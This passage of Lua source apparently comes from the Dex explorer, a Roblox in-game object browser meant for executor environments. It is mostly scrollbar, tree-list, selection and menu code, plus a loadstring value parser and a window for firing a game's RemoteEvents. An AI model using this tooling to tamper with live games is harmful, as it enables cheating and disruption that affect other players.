ScrollDownFrame.AutoButtonColor = down local children = ScrollDownGraphic:GetChildren() local style = down and scrollStyle or scrollStyle_ds for i = 1,#children do Create(children[i],style) end end if up ~= lastUp then lastUp = up ScrollUpFrame.Active = up ScrollUpFrame.AutoButtonColor = up local children = ScrollUpGraphic:GetChildren() local style = up and scrollStyle or scrollStyle_ds for i = 1,#children do Create(children[i],style) end end ScrollThumbFrame.Visible = down or up UpdateScrollThumb() end Class.Update = Update SetZIndexOnChanged(ScrollFrame) local MouseDrag = Create('ImageButton',{ Name = "MouseDrag"; Position = UDim2.new(-0.25,0,-0.25,0); Size = UDim2.new(1.5,0,1.5,0); Transparency = 1; AutoButtonColor = false; Active = true; ZIndex = 10; }) local scrollEventID = 0 ScrollDownFrame.MouseButton1Down:connect(function() scrollEventID = tick() local current = scrollEventID local up_con up_con = MouseDrag.MouseButton1Up:connect(function() scrollEventID = tick() MouseDrag.Parent = nil ResetButtonColor(ScrollDownFrame) up_con:disconnect(); drag = nil end) MouseDrag.Parent = GetScreen(ScrollFrame) Class:ScrollDown() wait(0.2) -- delay before auto scroll while scrollEventID == current do Class:ScrollDown() if not Class:CanScrollDown() then break end wait() end end) ScrollDownFrame.MouseButton1Up:connect(function() scrollEventID = tick() end) ScrollUpFrame.MouseButton1Down:connect(function() scrollEventID = tick() local current = scrollEventID local up_con up_con = MouseDrag.MouseButton1Up:connect(function() scrollEventID = tick() MouseDrag.Parent = nil ResetButtonColor(ScrollUpFrame) up_con:disconnect(); drag = nil end) MouseDrag.Parent = GetScreen(ScrollFrame) Class:ScrollUp() wait(0.2) while scrollEventID == current do Class:ScrollUp() if not Class:CanScrollUp() then break end wait() end end) ScrollUpFrame.MouseButton1Up:connect(function() scrollEventID = tick() end) if horizontal then ScrollBarFrame.MouseButton1Down:connect(function(x,y) scrollEventID = tick() local current = scrollEventID local up_con up_con = MouseDrag.MouseButton1Up:connect(function() scrollEventID = tick() MouseDrag.Parent = nil ResetButtonColor(ScrollUpFrame) up_con:disconnect(); drag = nil end) MouseDrag.Parent = GetScreen(ScrollFrame) if x > ScrollThumbFrame.AbsolutePosition.x then Class:ScrollTo(Class.ScrollIndex + Class.VisibleSpace) wait(0.2) while scrollEventID == current do if x < ScrollThumbFrame.AbsolutePosition.x + ScrollThumbFrame.AbsoluteSize.x then break end Class:ScrollTo(Class.ScrollIndex + Class.VisibleSpace) wait() end else Class:ScrollTo(Class.ScrollIndex - Class.VisibleSpace) wait(0.2) while scrollEventID == current do if x > ScrollThumbFrame.AbsolutePosition.x then break end Class:ScrollTo(Class.ScrollIndex - Class.VisibleSpace) wait() end end end) else ScrollBarFrame.MouseButton1Down:connect(function(x,y) scrollEventID = tick() local current = scrollEventID local up_con up_con = MouseDrag.MouseButton1Up:connect(function() scrollEventID = tick() MouseDrag.Parent = nil ResetButtonColor(ScrollUpFrame) up_con:disconnect(); drag = nil end) MouseDrag.Parent = GetScreen(ScrollFrame) if y > ScrollThumbFrame.AbsolutePosition.y then Class:ScrollTo(Class.ScrollIndex + Class.VisibleSpace) wait(0.2) while scrollEventID == current do if y < ScrollThumbFrame.AbsolutePosition.y + ScrollThumbFrame.AbsoluteSize.y then break end Class:ScrollTo(Class.ScrollIndex + Class.VisibleSpace) wait() end else Class:ScrollTo(Class.ScrollIndex - Class.VisibleSpace) wait(0.2) while scrollEventID == current do if y > ScrollThumbFrame.AbsolutePosition.y then break end Class:ScrollTo(Class.ScrollIndex - Class.VisibleSpace) wait() end end end) end if horizontal then ScrollThumbFrame.MouseButton1Down:connect(function(x,y) scrollEventID = tick() local mouse_offset = x - ScrollThumbFrame.AbsolutePosition.x local drag_con local up_con drag_con = MouseDrag.MouseMoved:connect(function(x,y) local bar_abs_pos = ScrollBarFrame.AbsolutePosition.x local bar_drag = ScrollBarFrame.AbsoluteSize.x - ScrollThumbFrame.AbsoluteSize.x local bar_abs_one = bar_abs_pos + bar_drag x = x - mouse_offset x = x < bar_abs_pos and bar_abs_pos or x > bar_abs_one and bar_abs_one or x x = x - bar_abs_pos Class:SetScrollPercent(x/(bar_drag)) end) up_con = MouseDrag.MouseButton1Up:connect(function() scrollEventID = tick() MouseDrag.Parent = nil ResetButtonColor(ScrollThumbFrame) drag_con:disconnect(); drag_con = nil up_con:disconnect(); drag = nil end) MouseDrag.Parent = GetScreen(ScrollFrame) end) else ScrollThumbFrame.MouseButton1Down:connect(function(x,y) scrollEventID = tick() local mouse_offset = y - ScrollThumbFrame.AbsolutePosition.y local drag_con local up_con drag_con = MouseDrag.MouseMoved:connect(function(x,y) local bar_abs_pos = ScrollBarFrame.AbsolutePosition.y local bar_drag = ScrollBarFrame.AbsoluteSize.y - ScrollThumbFrame.AbsoluteSize.y local bar_abs_one = bar_abs_pos + bar_drag y = y - mouse_offset y = y < bar_abs_pos and bar_abs_pos or y > bar_abs_one and bar_abs_one or y y = y - bar_abs_pos Class:SetScrollPercent(y/(bar_drag)) end) up_con = MouseDrag.MouseButton1Up:connect(function() scrollEventID = tick() MouseDrag.Parent = nil ResetButtonColor(ScrollThumbFrame) drag_con:disconnect(); drag_con = nil up_con:disconnect(); drag = nil end) MouseDrag.Parent = GetScreen(ScrollFrame) end) end function Class:Destroy() ScrollFrame:Destroy() MouseDrag:Destroy() for k in pairs(Class) do Class[k] = nil end setmetatable(Class,nil) end Update() return Class end end ---------------------------------------------------------------- ---------------------------------------------------------------- ---------------------------------------------------------------- ---------------------------------------------------------------- ---- Explorer panel local explorerPanel = D_E_X.ExplorerPanel Create(explorerPanel,{ BackgroundColor3 = GuiColor.Field; BorderColor3 = GuiColor.Border; Active = true; }) local SettingsRemote = explorerPanel.Parent:WaitForChild("SettingsPanel"):WaitForChild("GetSetting") local GetApiRemote = explorerPanel.Parent:WaitForChild("PropertiesFrame"):WaitForChild("GetApi") local GetAwaitRemote = explorerPanel.Parent:WaitForChild("PropertiesFrame"):WaitForChild("GetAwaiting") local bindSetAwaiting = explorerPanel.Parent:WaitForChild("PropertiesFrame"):WaitForChild("SetAwaiting") local SaveInstanceWindow = explorerPanel.Parent:WaitForChild("SaveInstance") local ConfirmationWindow = explorerPanel.Parent:WaitForChild("Confirmation") local CautionWindow = explorerPanel.Parent:WaitForChild("Caution") local TableCautionWindow = explorerPanel.Parent:WaitForChild("TableCaution") local RemoteWindow = explorerPanel.Parent:WaitForChild("CallRemote") local ScriptEditor = explorerPanel.Parent:WaitForChild("ScriptEditor") local ScriptEditorEvent = ScriptEditor:WaitForChild("OpenScript") local CurrentSaveInstanceWindow local CurrentRemoteWindow local lastSelectedNode local DexStorage local DexStorageMain local DexStorageEnabled if saveinstance then DexStorageEnabled = true end if DexStorageEnabled then DexStorage = Instance.new("Folder") DexStorage.Name = "Dex" DexStorageMain = Instance.new("Folder",DexStorage) DexStorageMain.Name = "DexStorage" end local NilStorage local NilStorageMain local NilStorageEnabled if get_nil_instances and IfThisFunctionWasStableEnough then NilStorageEnabled = true end if NilStorageEnabled then NilStorage = Instance.new("Folder") NilStorage.Name = "Dex Internal Storage" NilStorageMain = Instance.new("Folder",NilStorage) NilStorageMain.Name = "Nil Instances" end local listFrame = Create('Frame',{ Name = "List"; BackgroundTransparency = 1; ClipsDescendants = true; Position = UDim2.new(0,0,0,HEADER_SIZE); Size = UDim2.new(1,-GUI_SIZE,1,-HEADER_SIZE); Parent = explorerPanel; }) local scrollBar = ScrollBar(false) scrollBar.PageIncrement = 1 Create(scrollBar.GUI,{ Position = UDim2.new(1,-GUI_SIZE,0,HEADER_SIZE); Size = UDim2.new(0,GUI_SIZE,1,-HEADER_SIZE); Parent = explorerPanel; }) local scrollBarH = ScrollBar(true) scrollBarH.PageIncrement = GUI_SIZE Create(scrollBarH.GUI,{ Position = UDim2.new(0,0,1,-GUI_SIZE); Size = UDim2.new(1,-GUI_SIZE,0,GUI_SIZE); Visible = false; Parent = explorerPanel; }) local headerFrame = Create('Frame',{ Name = "Header"; BackgroundColor3 = GuiColor.Background; BorderColor3 = GuiColor.Border; Position = UDim2.new(0,0,0,0); Size = UDim2.new(1,0,0,HEADER_SIZE); Parent = explorerPanel; Create('TextLabel',{ Text = "Explorer"; BackgroundTransparency = 1; TextColor3 = GuiColor.Text; TextXAlignment = 'Left'; Font = FONT; FontSize = FONT_SIZE; Position = UDim2.new(0,4,0,0); Size = UDim2.new(1,-4,0.5,0); }); }) local explorerFilter = Create('TextBox',{ Text = "Filter Workspace"; BackgroundTransparency = 0.8; TextColor3 = GuiColor.Text; TextXAlignment = 'Left'; Font = FONT; FontSize = FONT_SIZE; Position = UDim2.new(0,4,0.5,0); Size = UDim2.new(1,-8,0.5,-2); }); explorerFilter.Parent = headerFrame SetZIndexOnChanged(explorerPanel) local function CreateColor3(r, g, b) return Color3.new(r/255,g/255,b/255) end local Styles = { Font = Enum.Font.Arial; Margin = 5; Black = CreateColor3(0,0,0); White = CreateColor3(255,255,255); } local DropDown = { Font = Styles.Font; FontSize = Enum.FontSize.Size14; TextColor = CreateColor3(0,0,0); TextColorOver = Styles.White; TextXAlignment = Enum.TextXAlignment.Left; Height = 20; BackColor = Styles.White; BackColorOver = CreateColor3(86,125,188); BorderColor = CreateColor3(216,216,216); BorderSizePixel = 2; ArrowColor = CreateColor3(160,160,160); ArrowColorOver = Styles.Black; } local Row = { Font = Styles.Font; FontSize = Enum.FontSize.Size14; TextXAlignment = Enum.TextXAlignment.Left; TextColor = Styles.Black; TextColorOver = Styles.White; TextLockedColor = CreateColor3(120,120,120); Height = 24; BorderColor = CreateColor3(216,216,216); BackgroundColor = Styles.White; BackgroundColorAlternate = CreateColor3(246,246,246); BackgroundColorMouseover = CreateColor3(211,224,244); TitleMarginLeft = 15; } local currentRightClickMenu local CurrentInsertObjectWindow local CurrentFunctionCallerWindow local RbxApi function ClassCanCreate(IName) local success,err = pcall(function() Instance.new(IName) end) if err then return false else return true end end function GetClasses() if RbxApi == nil then return {} end local classTable = {} for i,v in pairs(RbxApi.Classes) do if ClassCanCreate(v.Name) then table.insert(classTable,v.Name) end end return classTable end local function sortAlphabetic(t, property) table.sort(t, function(x,y) return x[property] < y[property] end) end local function FunctionIsHidden(functionData) local tags = functionData["tags"] for _,name in pairs(tags) do if name == "deprecated" or name == "hidden" or name == "writeonly" then return true end end return false end local function GetAllFunctions(className) local class = RbxApi.Classes[className] local functions = {} if not class then return functions end while class do if class.Name == "Instance" then break end for _,nextFunction in pairs(class.Functions) do if not FunctionIsHidden(nextFunction) then table.insert(functions, nextFunction) end end class = RbxApi.Classes[class.Superclass] end sortAlphabetic(functions, "Name") return functions end function GetFunctions() if RbxApi == nil then return {} end local List = SelectionVar():Get() if #List == 0 then return end local MyObject = List[1] local functionTable = {} for i,v in pairs(GetAllFunctions(MyObject.ClassName)) do table.insert(functionTable,v) end return functionTable end function CreateInsertObjectMenu(choices, currentChoice, readOnly, onClick) local mouse = game:GetService("Players").LocalPlayer:GetMouse() local totalSize = explorerPanel.Parent.AbsoluteSize.y if #choices == 0 then return end table.sort(choices, function(a,b) return a < b end) local frame = Instance.new("Frame") frame.Name = "InsertObject" frame.Size = UDim2.new(0, 200, 1, 0) frame.BackgroundTransparency = 1 frame.Active = true local menu = nil local arrow = nil local expanded = false local margin = DropDown.BorderSizePixel; --[[ local button = Instance.new("TextButton") button.Font = Row.Font button.FontSize = Row.FontSize button.TextXAlignment = Row.TextXAlignment button.BackgroundTransparency = 1 button.TextColor3 = Row.TextColor if readOnly then button.TextColor3 = Row.TextLockedColor end button.Text = currentChoice button.Size = UDim2.new(1, -2 * Styles.Margin, 1, 0) button.Position = UDim2.new(0, Styles.Margin, 0, 0) button.Parent = frame --]] local function hideMenu() expanded = false --showArrow(DropDown.ArrowColor) if frame then --frame:Destroy() CurrentInsertObjectWindow.Visible = false end end local function showMenu() expanded = true menu = Instance.new("ScrollingFrame") menu.Size = UDim2.new(0,200,1,0) menu.CanvasSize = UDim2.new(0, 200, 0, #choices * DropDown.Height) menu.Position = UDim2.new(0, margin, 0, 0) menu.BackgroundTransparency = 0 menu.BackgroundColor3 = DropDown.BackColor menu.BorderColor3 = DropDown.BorderColor menu.BorderSizePixel = DropDown.BorderSizePixel menu.TopImage = "rbxasset://textures/blackBkg_square.png" menu.MidImage = "rbxasset://textures/blackBkg_square.png" menu.BottomImage = "rbxasset://textures/blackBkg_square.png" menu.Active = true menu.ZIndex = 5 menu.Parent = frame --local parentFrameHeight = script.Parent.List.Size.Y.Offset --local rowHeight = mouse.Y --if (rowHeight + menu.Size.Y.Offset) > parentFrameHeight then -- menu.Position = UDim2.new(0, margin, 0, -1 * (#choices * DropDown.Height) - margin) --end local function choice(name) onClick(name) hideMenu() end for i,name in pairs(choices) do local option = CreateRightClickMenuItem(name, function() choice(name) end,1) option.Size = UDim2.new(1, 0, 0, 20) option.Position = UDim2.new(0, 0, 0, (i - 1) * DropDown.Height) option.ZIndex = menu.ZIndex option.Parent = menu end end showMenu() return frame end function CreateFunctionCallerMenu(choices, currentChoice, readOnly, onClick) local mouse = game:GetService("Players").LocalPlayer:GetMouse() local totalSize = explorerPanel.Parent.AbsoluteSize.y if #choices == 0 then return end table.sort(choices, function(a,b) return a.Name < b.Name end) local frame = Instance.new("Frame") frame.Name = "InsertObject" frame.Size = UDim2.new(0, 200, 1, 0) frame.BackgroundTransparency = 1 frame.Active = true local menu = nil local arrow = nil local expanded = false local margin = DropDown.BorderSizePixel; local function hideMenu() expanded = false --showArrow(DropDown.ArrowColor) if frame then --frame:Destroy() CurrentInsertObjectWindow.Visible = false end end local function showMenu() expanded = true menu = Instance.new("ScrollingFrame") menu.Size = UDim2.new(0,300,1,0) menu.CanvasSize = UDim2.new(0, 300, 0, #choices * DropDown.Height) menu.Position = UDim2.new(0, margin, 0, 0) menu.BackgroundTransparency = 0 menu.BackgroundColor3 = DropDown.BackColor menu.BorderColor3 = DropDown.BorderColor menu.BorderSizePixel = DropDown.BorderSizePixel menu.TopImage = "rbxasset://textures/blackBkg_square.png" menu.MidImage = "rbxasset://textures/blackBkg_square.png" menu.BottomImage = "rbxasset://textures/blackBkg_square.png" menu.Active = true menu.ZIndex = 5 menu.Parent = frame --local parentFrameHeight = script.Parent.List.Size.Y.Offset --local rowHeight = mouse.Y --if (rowHeight + menu.Size.Y.Offset) > parentFrameHeight then -- menu.Position = UDim2.new(0, margin, 0, -1 * (#choices * DropDown.Height) - margin) --end local function GetParameters(functionData) local paraString = "" paraString = paraString.."(" for i,v in pairs(functionData.Arguments) do paraString = paraString..v.Type.." "..v.Name if i < #functionData.Arguments then paraString = paraString..", " end end paraString = paraString..")" return paraString end local function choice(name) onClick(name) hideMenu() end for i,name in pairs(choices) do local option = CreateRightClickMenuItem(name.ReturnType.." "..name.Name..GetParameters(name), function() choice(name) end,2) option.Size = UDim2.new(1, 0, 0, 20) option.Position = UDim2.new(0, 0, 0, (i - 1) * DropDown.Height) option.ZIndex = menu.ZIndex option.Parent = menu end end showMenu() return frame end function CreateInsertObject() if not CurrentInsertObjectWindow then return end CurrentInsertObjectWindow.Visible = true if currentRightClickMenu and CurrentInsertObjectWindow.Visible then CurrentInsertObjectWindow.Position = UDim2.new(0,currentRightClickMenu.Position.X.Offset-currentRightClickMenu.Size.X.Offset-2,0,0) end if CurrentInsertObjectWindow.Visible then CurrentInsertObjectWindow.Parent = explorerPanel.Parent end end function CreateFunctionCaller() if CurrentFunctionCallerWindow then CurrentFunctionCallerWindow:Destroy() CurrentFunctionCallerWindow = nil end CurrentFunctionCallerWindow = CreateFunctionCallerMenu( GetFunctions(), "", false, function(option) CurrentFunctionCallerWindow:Destroy() CurrentFunctionCallerWindow = nil local list = SelectionVar():Get() for i = 1,#list do pcall(function() Instance.new(option,list[i]) end) end print(option.Name .. " selected to be called. Function caller being added soon, please wait!") --CallFunction() DestroyRightClick() end ) if currentRightClickMenu and CurrentFunctionCallerWindow then CurrentFunctionCallerWindow.Position = UDim2.new(0,currentRightClickMenu.Position.X.Offset-currentRightClickMenu.Size.X.Offset*1.5-2,0,0) end if CurrentFunctionCallerWindow then CurrentFunctionCallerWindow.Parent = explorerPanel.Parent end end function CreateRightClickMenuItem(text, onClick, insObj) local button = Instance.new("TextButton") button.Font = DropDown.Font button.FontSize = DropDown.FontSize button.TextColor3 = DropDown.TextColor button.TextXAlignment = DropDown.TextXAlignment button.BackgroundColor3 = DropDown.BackColor button.AutoButtonColor = false button.BorderSizePixel = 0 button.Active = true button.Text = text if insObj == 1 then local newIcon = Icon(nil,ExplorerIndex[text] or 0) newIcon.Position = UDim2.new(0,0,0,2) newIcon.Size = UDim2.new(0,16,0,16) newIcon.IconMap.ZIndex = 5 newIcon.Parent = button button.Text = "\t\t"..button.Text elseif insObj == 2 then button.FontSize = Enum.FontSize.Size11 end button.MouseEnter:connect(function() button.TextColor3 = DropDown.TextColorOver button.BackgroundColor3 = DropDown.BackColorOver if not insObj and CurrentInsertObjectWindow then if CurrentInsertObjectWindow.Visible == false and button.Text == "Insert Object" then CreateInsertObject() elseif CurrentInsertObjectWindow.Visible and button.Text ~= "Insert Object" then CurrentInsertObjectWindow.Visible = false end end if not insObj then if CurrentFunctionCallerWindow and button.Text ~= "Call Function" then CurrentFunctionCallerWindow:Destroy() CurrentFunctionCallerWindow = nil elseif button.Text == "Call Function" then CreateFunctionCaller() end end end) button.MouseLeave:connect(function() button.TextColor3 = DropDown.TextColor button.BackgroundColor3 = DropDown.BackColor end) button.MouseButton1Click:connect(function() button.TextColor3 = DropDown.TextColor button.BackgroundColor3 = DropDown.BackColor onClick(text) end) return button end function CreateRightClickMenu(choices, currentChoice, readOnly, onClick) local mouse = game:GetService("Players").LocalPlayer:GetMouse() local frame = Instance.new("Frame") frame.Name = "DropDown" frame.Size = UDim2.new(0, 200, 1, 0) frame.BackgroundTransparency = 1 frame.Active = true local menu = nil local arrow = nil local expanded = false local margin = DropDown.BorderSizePixel; --[[ local button = Instance.new("TextButton") button.Font = Row.Font button.FontSize = Row.FontSize button.TextXAlignment = Row.TextXAlignment button.BackgroundTransparency = 1 button.TextColor3 = Row.TextColor if readOnly then button.TextColor3 = Row.TextLockedColor end button.Text = currentChoice button.Size = UDim2.new(1, -2 * Styles.Margin, 1, 0) button.Position = UDim2.new(0, Styles.Margin, 0, 0) button.Parent = frame --]] local function hideMenu() expanded = false --showArrow(DropDown.ArrowColor) if frame then frame:Destroy() DestroyRightClick() end end local function showMenu() expanded = true menu = Instance.new("Frame") menu.Size = UDim2.new(0, 200, 0, #choices * DropDown.Height) menu.Position = UDim2.new(0, margin, 0, 5) menu.BackgroundTransparency = 0 menu.BackgroundColor3 = DropDown.BackColor menu.BorderColor3 = DropDown.BorderColor menu.BorderSizePixel = DropDown.BorderSizePixel menu.Active = true menu.ZIndex = 5 menu.Parent = frame --local parentFrameHeight = script.Parent.List.Size.Y.Offset --local rowHeight = mouse.Y --if (rowHeight + menu.Size.Y.Offset) > parentFrameHeight then -- menu.Position = UDim2.new(0, margin, 0, -1 * (#choices * DropDown.Height) - margin) --end local function choice(name) onClick(name) hideMenu() end for i,name in pairs(choices) do local option = CreateRightClickMenuItem(name, function() choice(name) end) option.Size = UDim2.new(1, 0, 0, 20) option.Position = UDim2.new(0, 0, 0, (i - 1) * DropDown.Height) option.ZIndex = menu.ZIndex option.Parent = menu end end showMenu() return frame end function checkMouseInGui(gui) if gui == nil then return false end local plrMouse = game:GetService("Players").LocalPlayer:GetMouse() local guiPosition = gui.AbsolutePosition local guiSize = gui.AbsoluteSize if plrMouse.X >= guiPosition.x and plrMouse.X <= guiPosition.x + guiSize.x and plrMouse.Y >= guiPosition.y and plrMouse.Y <= guiPosition.y + guiSize.y then return true else return false end end local clipboard = {} local function delete(o) Destroy(o) end local getTextWidth do local text = Create('TextLabel',{ Name = "TextWidth"; TextXAlignment = 'Left'; TextYAlignment = 'Center'; Font = FONT; FontSize = FONT_SIZE; Text = ""; Position = UDim2.new(0,0,0,0); Size = UDim2.new(1,0,1,0); Visible = false; Parent = explorerPanel; }) function getTextWidth(s) text.Text = s return text.TextBounds.x end end local nameScanned = false -- Holds the game tree converted to a list. local TreeList = {} -- Matches objects to their tree node representation. local NodeLookup = {} local nodeWidth = 0 local QuickButtons = {} function filteringWorkspace() if explorerFilter.Text ~= "" and explorerFilter.Text ~= "Filter Workspace" then return true end return false end function lookForAName(obj,name) for i,v in pairs(obj:GetChildren()) do if string.find(string.lower(v.Name),string.lower(name)) then nameScanned = true end lookForAName(v,name) end end function scanName(obj) nameScanned = false if string.find(string.lower(obj.Name),string.lower(explorerFilter.Text)) then nameScanned = true else lookForAName(obj,explorerFilter.Text) end return nameScanned end function updateActions() for i,v in pairs(QuickButtons) do if v.Cond() then v.Toggle(true) else v.Toggle(false) end end end local updateList,rawUpdateList,updateScroll,rawUpdateSize do local function r(t) for i = 1,#t do if not filteringWorkspace() or scanName(t[i].Object) then TreeList[#TreeList+1] = t[i] local w = (t[i].Depth)*(2+ENTRY_PADDING+GUI_SIZE) + 2 + ENTRY_SIZE + 4 + getTextWidth(t[i].Object.Name) + 4 if w > nodeWidth then nodeWidth = w end if t[i].Expanded or filteringWorkspace() then r(t[i]) end end end end function rawUpdateSize() scrollBarH.TotalSpace = nodeWidth scrollBarH.VisibleSpace = listFrame.AbsoluteSize.x scrollBarH:Update() local visible = scrollBarH:CanScrollDown() or scrollBarH:CanScrollUp() scrollBarH.GUI.Visible = visible listFrame.Size = UDim2.new(1,-GUI_SIZE,1,-GUI_SIZE*(visible and 1 or 0) - HEADER_SIZE) scrollBar.VisibleSpace = math.ceil(listFrame.AbsoluteSize.y/ENTRY_BOUND) scrollBar.GUI.Size = UDim2.new(0,GUI_SIZE,1,-GUI_SIZE*(visible and 1 or 0) - HEADER_SIZE) scrollBar.TotalSpace = #TreeList+1 scrollBar:Update() end function rawUpdateList() -- Clear then repopulate the entire list. It appears to be fast enough. TreeList = {} nodeWidth = 0 r(NodeLookup[game:GetService("Workspace").Parent]) if DexStorageEnabled then r(NodeLookup[DexStorage]) end if NilStorageEnabled then r(NodeLookup[NilStorage]) end rawUpdateSize() updateActions() end -- Adding or removing large models will cause many updates to occur. We -- can reduce the number of updates by creating a delay, then dropping any -- updates that occur during the delay. local updatingList = false function updateList() if updatingList then return end updatingList = true wait(0.25) updatingList = false rawUpdateList() end local updatingScroll = false function updateScroll() if updatingScroll then return end updatingScroll = true wait(0.25) updatingScroll = false scrollBar:Update() end end local Selection do local bindGetSelection = explorerPanel:FindFirstChild("TotallyNotGetSelection") if not bindGetSelection then bindGetSelection = Create('BindableFunction',{Name = "TotallyNotGetSelection"}) bindGetSelection.Parent = explorerPanel end local bindSetSelection = explorerPanel:FindFirstChild("TotallyNotSetSelection") if not bindSetSelection then bindSetSelection = Create('BindableFunction',{Name = "TotallyNotSetSelection"}) bindSetSelection.Parent = explorerPanel end local bindSelectionChanged = explorerPanel:FindFirstChild("TotallyNotSelectionChanged") if not bindSelectionChanged then bindSelectionChanged = Create('BindableEvent',{Name = "TotallyNotSelectionChanged"}) bindSelectionChanged.Parent = explorerPanel end local SelectionList = {} local SelectionSet = {} local Updates = true Selection = { Selected = SelectionSet; List = SelectionList; } local function addObject(object) -- list update local lupdate = false -- scroll update local supdate = false if not SelectionSet[object] then local node = NodeLookup[object] if node then table.insert(SelectionList,object) SelectionSet[object] = true node.Selected = true -- expand all ancestors so that selected node becomes visible node = node.Parent while node do if not node.Expanded then node.Expanded = true lupdate = true end node = node.Parent end supdate = true end end return lupdate,supdate end function Selection:Set(objects) local lupdate = false local supdate = false if #SelectionList > 0 then for i = 1,#SelectionList do local object = SelectionList[i] local node = NodeLookup[object] if node then node.Selected = false SelectionSet[object] = nil end end SelectionList = {} Selection.List = SelectionList supdate = true end for i = 1,#objects do local l,s = addObject(objects[i]) lupdate = l or lupdate supdate = s or supdate end if lupdate then rawUpdateList() supdate = true elseif supdate then scrollBar:Update() end if supdate then bindSelectionChanged:Fire() updateActions() end end function Selection:Add(object) local l,s = addObject(object) if l then rawUpdateList() if Updates then bindSelectionChanged:Fire() updateActions() end elseif s then scrollBar:Update() if Updates then bindSelectionChanged:Fire() updateActions() end end end function Selection:StopUpdates() Updates = false end function Selection:ResumeUpdates() Updates = true bindSelectionChanged:Fire() updateActions() end function Selection:Remove(object,noupdate) if SelectionSet[object] then local node = NodeLookup[object] if node then node.Selected = false SelectionSet[object] = nil for i = 1,#SelectionList do if SelectionList[i] == object then table.remove(SelectionList,i) break end end if not noupdate then scrollBar:Update() end bindSelectionChanged:Fire() updateActions() end end end function Selection:Get() local list = {} for i = 1,#SelectionList do list[i] = SelectionList[i] end return list end bindSetSelection.OnInvoke = function(...) Selection:Set(...) end bindGetSelection.OnInvoke = function() return Selection:Get() end end function CreateCaution(title,msg) local newCaution = CautionWindow:Clone() newCaution.Title.Text = title newCaution.MainWindow.Desc.Text = msg newCaution.Parent = explorerPanel.Parent newCaution.Visible = true newCaution.MainWindow.Ok.MouseButton1Up:connect(function() newCaution:Destroy() end) end function CreateTableCaution(title,msg) if type(msg) ~= "table" then return CreateCaution(title,tostring(msg)) end local newCaution = TableCautionWindow:Clone() newCaution.Title.Text = title local TableList = newCaution.MainWindow.TableResults local TableTemplate = newCaution.MainWindow.TableTemplate for i,v in pairs(msg) do local newResult = TableTemplate:Clone() newResult.Type.Text = type(v) newResult.Value.Text = tostring(v) newResult.Position = UDim2.new(0,0,0,#TableList:GetChildren() * 20) newResult.Parent = TableList TableList.CanvasSize = UDim2.new(0,0,0,#TableList:GetChildren() * 20) newResult.Visible = true end newCaution.Parent = explorerPanel.Parent newCaution.Visible = true newCaution.MainWindow.Ok.MouseButton1Up:connect(function() newCaution:Destroy() end) end local function Split(str, delimiter) local start = 1 local t = {} while true do local pos = string.find (str, delimiter, start, true) if not pos then break end table.insert (t, string.sub (str, start, pos - 1)) start = pos + string.len (delimiter) end table.insert (t, string.sub (str, start)) return t end local function ToValue(value,type) if type == "Vector2" then local list = Split(value,",") if #list < 2 then return nil end local x = tonumber(list[1]) or 0 local y = tonumber(list[2]) or 0 return Vector2.new(x,y) elseif type == "Vector3" then local list = Split(value,",") if #list < 3 then return nil end local x = tonumber(list[1]) or 0 local y = tonumber(list[2]) or 0 local z = tonumber(list[3]) or 0 return Vector3.new(x,y,z) elseif type == "Color3" then local list = Split(value,",") if #list < 3 then return nil end local r = tonumber(list[1]) or 0 local g = tonumber(list[2]) or 0 local b = tonumber(list[3]) or 0 return Color3.new(r/255,g/255, b/255) elseif type == "UDim2" then local list = Split(string.gsub(string.gsub(value, "{", ""),"}",""),",") if #list < 4 then return nil end local xScale = tonumber(list[1]) or 0 local xOffset = tonumber(list[2]) or 0 local yScale = tonumber(list[3]) or 0 local yOffset = tonumber(list[4]) or 0 return UDim2.new(xScale, xOffset, yScale, yOffset) elseif type == "Number" then return tonumber(value) elseif type == "String" then return value elseif type == "NumberRange" then local list = Split(value,",") if #list == 1 then if tonumber(list[1]) == nil then return nil end local newVal = tonumber(list[1]) or 0 return NumberRange.new(newVal) end if #list < 2 then return nil end local x = tonumber(list[1]) or 0 local y = tonumber(list[2]) or 0 return NumberRange.new(x,y) elseif type == "Script" then local success,err = ypcall(function() _G.D_E_X_DONOTUSETHISPLEASE = nil loadstring( "_G.D_E_X_DONOTUSETHISPLEASE = "..value )() return _G.D_E_X_DONOTUSETHISPLEASE end) if err then return nil end else return nil end end local function ToPropValue(value,type) if type == "Vector2" then local list = Split(value,",") if #list < 2 then return nil end local x = tonumber(list[1]) or 0 local y = tonumber(list[2]) or 0 return Vector2.new(x,y) elseif type == "Vector3" then local list = Split(value,",") if #list < 3 then return nil end local x = tonumber(list[1]) or 0 local y = tonumber(list[2]) or 0 local z = tonumber(list[3]) or 0 return Vector3.new(x,y,z) elseif type == "Color3" then local list = Split(value,",") if #list < 3 then return nil end local r = tonumber(list[1]) or 0 local g = tonumber(list[2]) or 0 local b = tonumber(list[3]) or 0 return Color3.new(r/255,g/255, b/255) elseif type == "UDim2" then local list = Split(string.gsub(string.gsub(value, "{", ""),"}",""),",") if #list < 4 then return nil end local xScale = tonumber(list[1]) or 0 local xOffset = tonumber(list[2]) or 0 local yScale = tonumber(list[3]) or 0 local yOffset = tonumber(list[4]) or 0 return UDim2.new(xScale, xOffset, yScale, yOffset) elseif type == "Content" then return value elseif type == "float" or type == "int" or type == "double" then return tonumber(value) elseif type == "string" then return value elseif type == "NumberRange" then local list = Split(value,",") if #list == 1 then if tonumber(list[1]) == nil then return nil end local newVal = tonumber(list[1]) or 0 return NumberRange.new(newVal) end if #list < 2 then return nil end local x = tonumber(list[1]) or 0 local y = tonumber(list[2]) or 0 return NumberRange.new(x,y) elseif string.sub(value,1,4) == "Enum" then local getEnum = value while true do local x,y = string.find(getEnum,".") if y then getEnum = string.sub(getEnum,y+1) else break end end print(getEnum) return getEnum else return nil end end function PromptRemoteCaller(inst) if CurrentRemoteWindow then CurrentRemoteWindow:Destroy() CurrentRemoteWindow = nil end CurrentRemoteWindow = RemoteWindow:Clone() CurrentRemoteWindow.Parent = explorerPanel.Parent CurrentRemoteWindow.Visible = true local displayValues = false local ArgumentList = CurrentRemoteWindow.MainWindow.Arguments local ArgumentTemplate = CurrentRemoteWindow.MainWindow.ArgumentTemplate if inst:IsA("RemoteEvent") then CurrentRemoteWindow.Title.Text = "Fire Event" CurrentRemoteWindow.MainWindow.Ok.Text = "Fire" CurrentRemoteWindow.MainWindow.DisplayReturned.Visible = false CurrentRemoteWindow.MainWindow.Desc2.Visible = false end local newArgument = ArgumentTemplate:Clone() newArgument.Parent = ArgumentList newArgument.Visible = true newArgument.Type.MouseButton1Down:connect(function() createDDown(newArgument.Type,function(choice) newArgument.Type.Text = choice 